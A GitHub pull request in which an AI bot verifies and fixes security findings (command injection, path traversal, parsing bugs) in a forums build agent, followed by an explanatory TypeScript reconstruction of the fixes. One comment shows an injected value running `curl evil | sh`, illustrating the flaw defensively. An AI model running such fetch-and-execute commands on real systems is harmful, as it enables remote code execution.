
build#110

Merged
julianbenegas merged 7 commits into main from jb/build-mode
Jan 19, 2026

Conversation

@julianbenegas
Member

No description provided.

@vercel
Contributor

vercel bot commented Jan 19, 2026

The latest updates on your projects. Learn more about Vercel for GitHub.

Project: forums | Deployment: Ready | Review: Ready | Updated (UTC): Jan 19, 2026 6:18am

@julianbenegas
Member Author

@claude verify vercel's feedback and if they're not false positives, apply 'em.

@claude

claude bot commented Jan 19, 2026

Claude finished @julianbenegas's task in 2m 36s


Vercel's Security Feedback Verified and Applied

  • Read affected files
  • Verify issue 1: Command injection in Bash tool ✓ LEGITIMATE
  • Verify issue 2: Directory traversal in normalizePath ✓ LEGITIMATE
  • Verify issue 3: Unhandled JSON.parse error ✓ LEGITIMATE
  • Verify issue 4: Exit code parsing bug ✓ LEGITIMATE
  • Apply fixes to build-tools.ts
  • Apply fixes to workspace.ts
  • Commit and push changes

Summary

All 4 issues reported by Vercel are legitimate and have been fixed:

  1. Command injection vulnerability (agent/tools/build-tools.ts:223-228)

    • Vulnerability allowing arbitrary code execution via template literal interpolation
    • Fixed by using bash positional parameters with proper escaping
  2. Directory traversal vulnerability (agent/tools/build-tools.ts:15-26)

    • Vulnerability allowing file access outside workspace via .. sequences
    • Fixed by using path.resolve() and validating resolved paths are within workspace
  3. Unhandled JSON.parse error (agent/workspace.ts:406, 555)

    • Missing error handling for malformed JSON causing unhandled exceptions
    • Fixed by wrapping in try-catch with detailed error logging
  4. Exit code parsing bug (agent/tools/build-tools.ts:242)

    • Bug causing incorrect exit codes when background processes output after marker
    • Fixed by removing end-of-string anchor from regex

Changes committed and pushed to jb/build-mode.

Branch: jb/build-mode

- Fix command injection in Bash tool by using positional parameters
- Fix directory traversal in normalizePath by validating resolved paths
- Add error handling for JSON.parse in workspace initialization
- Fix exit code parsing to handle background process output

Co-authored-by: Julian Benegas <julianbenegas@users.noreply.github.com>
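The three build-tools.ts fixes in the bot summary above (positional parameters for the Bash tool, a resolved-path containment check for normalizePath, and an unanchored exit-code regex) are reconstructed below as an added TypeScript example. This is not code from the forums repository or from the PR; the function names, the `__BUILD_TOOL_EXIT__` marker, the script body and the sample output are assumptions made for illustration.

```typescript
import * as path from "node:path";

// Hypothetical marker the bash script prints after the user's command so the
// caller can recover the exit status from captured stdout. Constant here for
// readability; a per-invocation random nonce would stop a command from forging it.
const EXIT_MARKER = "__BUILD_TOOL_EXIT__";

// Fix 2 (directory traversal). Resolve the caller-supplied path against the
// workspace root and require the result to stay inside it. path.relative() is
// used for the containment test rather than startsWith(), because
// "/ws-evil/x".startsWith("/ws") is true while that path is outside the workspace.
// path.posix is used because the build workspace is a Linux checkout.
function isInsideWorkspace(workspaceRoot: string, userPath: string): boolean {
  const root = path.posix.resolve(workspaceRoot);
  const resolved = path.posix.resolve(root, userPath);
  const rel = path.posix.relative(root, resolved);
  if (rel === "") return true; // the root itself
  // ".." or "../x" escapes; "..foo" is a legitimate file name and must stay allowed.
  return !(rel === ".." || rel.startsWith("../") || path.posix.isAbsolute(rel));
}

function resolveInsideWorkspace(workspaceRoot: string, userPath: string): string {
  if (!isInsideWorkspace(workspaceRoot, userPath)) {
    throw new Error(`path escapes workspace: ${userPath}`);
  }
  return path.posix.resolve(path.posix.resolve(workspaceRoot), userPath);
}

// Fix 1 (command injection). The script text is a constant; the workspace
// directory and the command arrive as bash positional parameters $1 and $2,
// so a directory named `x"; curl evil | sh; "` is data seen by `cd`, not shell
// syntax. The vulnerable pattern this replaces interpolated both values into the
// script string with a template literal. The command runs in a subshell so an
// `exit N` inside it still lets the marker line print.
function buildBashArgv(workspaceRoot: string, command: string): string[] {
  const script = `cd -- "$1" && (eval "$2"); echo "${EXIT_MARKER}:$?"`;
  // argv[3] ("bash") becomes $0 inside the script; $1 and $2 follow.
  return ["bash", "-c", script, "bash", workspaceRoot, command];
}

// Fix 4 (exit code parsing). The command may have started a background process
// that keeps writing after the marker, so the marker is not always at the end of
// the captured output. The `$`-anchored pattern (kept only to show the bug)
// returns null in that case; the unanchored one finds the marker wherever it is.
const EXIT_RE_BUGGY = new RegExp(`${EXIT_MARKER}:(\\d+)\\s*$`);
const EXIT_RE = new RegExp(`${EXIT_MARKER}:(\\d+)`);

function parseExitCode(output: string, re: RegExp = EXIT_RE): number | null {
  const m = re.exec(output);
  return m ? Number(m[1]) : null;
}

// Split captured output into what the command printed and its exit status,
// dropping the marker line and anything a background process wrote after it.
function splitToolOutput(output: string): { stdout: string; exitCode: number | null } {
  const m = EXIT_RE.exec(output);
  if (!m) return { stdout: output, exitCode: null };
  return { stdout: output.slice(0, m.index).replace(/\n$/, ""), exitCode: Number(m[1]) };
}
```

`buildBashArgv` returns an argv array for `child_process.spawn`, never a string for `exec`, so no shell ever re-parses the directory or the command. Two caveats a reviewer would raise on the real code: the containment check must be applied to the final resolved path (after symlink resolution, if the tool follows symlinks), and a command that prints the marker itself can spoof the exit status unless the marker is unguessable per invocation.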
julianbenegas and others added 2 commits January 18, 2026 21:45
- Configure git credential helper to use GH_TOKEN at runtime instead of
  relying on gh auth setup-git (which doesn't work without token in env)
- Sanitize Bash tool stdout/stderr to redact leaked tokens
- Update system prompt: clarify git is pre-configured, push just works
- Use unique branch names with random suffix to avoid conflicts
- Move inline regex to top-level to fix biome warning

Co-Authored-By: Claude Opus 4.5 <noreply@anthropic.com>

- Pass userEmail/userName through streamTextStep to getWorkspace
- Make userEmail/userName required in initializeBuildWorkspace
- Remove silent fallback to "Forums Build Agent" defaults
- Throw error if user identity missing in build mode
- Convert initializeBuildWorkspace and initializeAskWorkspace to object params

Co-Authored-By: Claude Opus 4.5 <noreply@anthropic.com>
Co-authored-by: Julian Benegas <julianbenegas@users.noreply.github.com>
@julianbenegas julianbenegas merged commit 1b61ec7 into main Jan 19, 2026
1 check passed
@julianbenegas julianbenegas deleted the jb/build-mode branch January 19, 2026 06:17
